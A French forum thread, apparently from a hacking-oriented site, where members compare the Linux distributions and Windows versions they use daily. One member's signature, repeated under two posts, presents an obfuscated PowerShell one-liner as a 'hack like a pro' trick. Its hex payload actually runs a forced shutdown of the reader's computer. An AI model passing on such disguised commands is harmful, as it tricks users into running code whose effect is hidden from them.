Annonce

Réduire
Aucune annonce.

Quel OS utilisez-vous ?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Quel OS utilisez-vous ?

    Hello !

    J'aurai aimer savoir quel OS ou distribution utilisez-vous au quotidien ?
    Pour ma part je suis sous ZORIN OS 12 Ultimate mais ça me gonfle déjà au bout de 4 jours, je sais pas pourquoi, j'hésite donc à basculer sur Debian car j'ai essayé une installation d'ArchLinux et ça à totalement foiré au milieu de l'installation à cause d'un fichier

    Voilà voilà, merci de vos réponses !

  • #2
    Hello !

    Personnellement je switch entre un Arch et QubeOS

    Si jamais ça t'intéresse : https://www.qubes-os.org/intro/

    Commentaire


    • #3
      Envoyé par Network Voir le message
      QubeOS
      T'as toujours besoin de "switch" en étant sur QubeOS ? On m'aurait menti ?


      Perso Windows 10 et Debian.
      Si t'hésitais à passer sur Debian :
      le gros + : c'est super stable
      le gros - : c'est grave en retard sur les ugrades de certains paquets (le prix de la stabilité quoi ...)
      Dernière modification par Krisscool, 04 août 2018, 10h28.
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Salut !
        Actuellement, je suis sur debian. Mais comme le dit Krisscool, il y a beaucoup de retard sur certains paquets (tu n'as pas la dernière version de firefox par exemple, mais tu peux toujours la rajouter "à la main"). C'est pour ça que je suis sur la version unstable. Tu "perds" le côté stable, mais tu as les toutes dernières mises à jour. Mais il vaut mieux avoir une bonne connexion, il y a souvent des mises à jour.

        Après, si Archlinux t'intéresse, tu peux tester Manjaro, une distribution que j'aime beaucoup. Elle est basée sur Arch, mais peut s'installer graphiquement et simplement. (Puis j'aime bien le thème de la version xfce, mais après les goûts et les couleurs .... )
        Il y a également Antergos, qui elle est plus un installeur pour Arch, il me semble, mais je ne me suis pas plus renseigné dessus.

        Mais ça dépend de ce que tu veux. Si tu souhaites une distribution stable, Debian est parfaite ; et pour avoir les toutes dernières mise à jour, Arch et ses filles sont pas mal.

        Commentaire


        • #5
          Bonjour,

          J'utilise Ubuntu... Pour en avoir testé une paire, ma préférence depuis plus de 15 ans reste Ubuntu ou Debian.

          Commentaire


          • #6
            Hello ,

            Pour ma part j'utilises Ubuntu en OS principal, Kali en VM et Windows8 4 a 5 fois dans l'année.

            Commentaire


            • #7
              Ubuntu également en principal. Windows 10 pour une paire d'applications "Windows only", et en secours (donc assez rarement).

              J'ai aussi une ISO de TrueOS qui traine et qu'il faut que je l'installe en parrallèle des deux autres depuis belle lurette, mais la flemme de m'y pencher...

              Commentaire


              • #8
                Wizenard : Depuis hier je suis sur Debian 9 et en peu de temps j'ai remarquer des ralentissements malgrès ma configuration récente, des bugs sur Chromium, une installation de paquets bête et méchante qui n'en fait qu'à sa tête, ça me semble être une vrai galère dans le temps. Me conseils-tu Manjaro pour une utilisation quotidienne ? J'aime bien l'interface déjà !


                Fred : Ubuntu j'aime bien aussi mais je trouve que il n'y a pas assez de commande, enfin le travail me semble mâché pour l'utilisateur et la configuration assez restreinte même que j'ai passé + d'un mois dessus.


                blend : Même réponse que Fred, Ubuntu semble mâché pour l'utilisateur et notamment est assez lent sur mon laptop (lancement etc)


                acloseone : Windows toujours là en cas de secours

                Commentaire


                • #9
                  Envoyé par Krisscool Voir le message
                  T'as toujours besoin de "switch" en étant sur QubeOS ? On m'aurait menti ?
                  Je switch par "plaisir" du custom toujours plus mon Arch mais sinon 90% du temps je suis sur Qube

                  Commentaire


                  • #10
                    Envoyé par Freysheur Voir le message
                    Fred : Ubuntu j'aime bien aussi mais je trouve que il n'y a pas assez de commande, enfin le travail me semble mâché pour l'utilisateur et la configuration assez restreinte même que j'ai passé + d'un mois dessus.
                    Je ne connais pas ta configuration matériel, mais je pense que si ton laptop est lent c'est sans doute dû à du matériel récent.

                    Pour les configurations, des fois, il est bon de ne pas mettre le nez dedans, tout dépend de tes connaissances dans le domaine. À toi de voir !

                    Commentaire


                    • #11
                      Envoyé par fred Voir le message

                      Je ne connais pas ta configuration matériel, mais je pense que si ton laptop est lent c'est sans doute dû à du matériel récent.

                      Pour les configurations, des fois, il est bon de ne pas mettre le nez dedans, tout dépend de tes connaissances dans le domaine. À toi de voir !
                      Bah sous Windows 10 il démarrait en 10 secondes, j'ai upgrade à 20Go de ram en DDR4, j'ai une GTX 950M 2Go, I5-6200U 2.8Ghz donc c'est quand même assez récent pour un laptop, là je suis sous Manjaro et pour l'instant tout est nickel, ça tourne comme une horloge, mon seul problème c'est les commandes qui sont en bash.. Mais je vais apprendre pas de soucis pour ça ! En tout cas là je suis assez satisfait du système

                      Commentaire


                      • #12
                        Content que Manjaro te plaise !
                        Renseigne toi bien sur pacman et yaourt

                        Commentaire


                        • #13
                          Envoyé par Krisscool Voir le message
                          Perso Windows 10 et Debian.
                          Si t'hésitais à passer sur Debian :
                          le gros + : c'est super stable
                          le gros - : c'est grave en retard sur les ugrades de certains paquets (le prix de la stabilité quoi ...)
                          Krisscool: Pour certains paquets c'est pas forcement indispensable d'avoir la derniere version. Pour les autres, il y a les backports Maintenant a toi de voir si tu as envi de passer du temps a la config.

                          Perso je suis sur:
                          - Ubuntu (plug and play)
                          - Debian
                          - Kali (sur machine physique)
                          - Windows 10

                          Manjaro me fait les yeux doux mais apres avoir essaye et avoir eu quelques soucis avec certains packages non compatibles... Ca m'a refroidi :/
                          Dernière modification par bambish, 13 août 2018, 12h24.

                          Commentaire


                          • #14
                            Petite question subsidiaire: Pour ceux qui sont sous autre chose que Kali: Comment faites vous pour avoir les tools qu'il faut sans trop se prendre la tete?
                            Il y a bien katoolin mais pour maintenir a jour c'est un peu le casse tete.

                            Commentaire


                            • #15
                              Envoyé par bambish Voir le message
                              Petite question subsidiaire: Pour ceux qui sont sous autre chose que Kali: Comment faites vous pour avoir les tools qu'il faut sans trop se prendre la tete?
                              Il y a bien katoolin mais pour maintenir a jour c'est un peu le casse tete.
                              Rien d'insurmontable, dans la mesure ou au final on est toujours loin d'avoir besoin de la pléthore de tools de Kali. Je vais pas faire d'énumération de tête là tissuite, mais je dois utiliser une 10ene de tools dispos sur Kali sur ma Debian, pour les trucs du quotidien.
                              Un maximum sont dispos via github, donc ça simplifie beaucoup les choses.
                              Cela dit, j'ai une VM Kali sur ma Debian, au cas où.
                              Hack like a pro :
                              PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                              Commentaire

                              Chargement...
                              X